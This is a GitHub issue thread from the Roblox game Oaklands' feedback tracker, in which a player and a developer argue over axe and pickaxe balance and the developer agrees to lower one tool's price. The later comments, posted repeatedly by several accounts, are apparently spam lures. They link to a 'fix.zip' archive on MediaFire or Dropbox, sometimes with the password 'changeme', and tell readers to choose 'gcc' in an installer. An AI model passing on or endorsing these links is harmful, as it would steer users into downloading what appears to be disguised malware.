### ISSUE TITLE
[IMPROVEMENTS]: Reinforced axe disbalance

### ISSUE THREAD

**Issue by 1Peekaboo1** [typical-developers/oaklands-feedback#879]
### Roblox Username

mr_peekeer3

### What do you think can have quality-of-life improvements?

As it stands currently, the harder to obtain axes like Emberbane and Petalfall are outclassed by a Reinforced axe, that is literally just sold in a shop. I believe this kind of defeats the whole point of going out of your way to craft these special items, as you can just buy an axe that is better in every aspect than them.

### How do you think things can be improved?

You can either buff Emberbane and Petalfall or nerf the swing speed on Reinforced axe. 

To provide evidence why this should be done i attached a link to a video comparing the three.
https://discord.com/channels/865737627712749579/894024102174658644/1253660838062198898

**Comment by HooferDevelops** [comment]
I don't see this happening. The Petalfall is meant to be good against Sakura trees, due to it's massive buff on them, and the same applies to Magma trees for the Emberbane. The Reinforced axe is an end-game axe for base woods.

**Comment by 1Peekaboo1** [comment]
The issue is that, in this case, the axes are then too niche to actually be useful. No one harvests sakura trees, and magma wood is still, despite being second place on the leaderboard, not at all popular. The number is inflated due to magma trees spawning in meteors, not because it's a popular tree. The path to get magma trees is really inconvenient and slim, and one choke point there results is trailers falling off 90% of the time

Another thing i want to mention is gleam harvester. For the time you spend getting it it's a really sluggish and unreliable pickaxe that is outclassed by Uncertainty Pickaxe, which pretty much costs absolutely nothing to get and is superior in general use to any other pickaxe. All in all, i think there is a clear problem with quest tools that needs to be tackled one way or another. If not directly, then indirectly (by making it worth grinding sakura or magma trees for example)

**Comment by HooferDevelops** [comment]
I think if they were too niche, nobody would be using them. The Petalfall is more of a cosmetic tool than anything. I disagree with the number being inflated due to magma trees in meteors, we nerfed the spawns in them for meteors and it still has been holding it's place, I believe people are still farming the trees.

The uncertain pickaxe recipe is going to be changed. At most, we'd nerf the uncertain pickaxe. The gleam harvester is not going to be buffed.

**Comment by 1Peekaboo1** [comment]
The reason why it seems that they're aren't niche, is because of people not being aware about the difference. They aren't aware that it's worse, because it just logically doesn't make sense why an axe that takes a lot more effort to get would be worse. People are just not informed.

After you nerfed the meteors the magma was switched from being on the first place, to being on the second. That has to mean something, right? Why if meteors were making a small amount of magma trees sold, the nerf affected it so drastically?

If you aren't going to buff gleam harvester, then you maybe at least make it useful for mining certain things. Maybe some new rocks or something. As it stands it's just not great to use at all. It's expensive and really slow. If anything, even a price nerf would make it more worth it to use

**Comment by Imjustjokingwithya** [comment]
I agree with Peek here, the amount of people in the Discord server (which should also translate to ingame) that aren't aware that reinforced axe is better than emberbane is a lot, almost every time someone asks what the best axe is or anything related they get surprised by the answers that reinforced axe is better than it. Just today (https://discord.com/channels/865737627712749579/894303588556357692/1277246755498496081) there was someone who literally did not believe it, even when three people told them that reinforced axe is the best axe, they thought they were being trolled.

**Comment by HooferDevelops** [comment]
I'll lower the price of the Gleam Harvester to 200 -> 150 credits, but I'm not going to touch the Reinforced Axe, Petalfall, or Emberbane.

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by south-sound** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
